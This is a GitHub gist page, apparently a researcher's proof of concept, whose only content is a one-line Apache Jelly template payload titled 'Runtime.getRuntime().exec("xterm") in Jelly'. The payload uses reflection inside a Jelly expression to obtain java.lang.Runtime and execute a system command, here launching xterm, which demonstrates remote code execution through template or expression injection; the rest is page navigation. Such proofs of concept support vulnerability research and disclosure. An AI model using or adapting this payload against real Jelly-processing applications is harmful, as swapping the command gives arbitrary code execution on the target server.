Skip to content

Instantly share code, notes, and snippets.

@mwulftange
Created September 28, 2017 12:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mwulftange/5794a347f66a2c08b53cccab1c146d4d to your computer and use it in GitHub Desktop.
Save mwulftange/5794a347f66a2c08b53cccab1c146d4d to your computer and use it in GitHub Desktop.
Runtime.getRuntime().exec("xterm") in Jelly
<j>${context.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('xterm')}</j>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment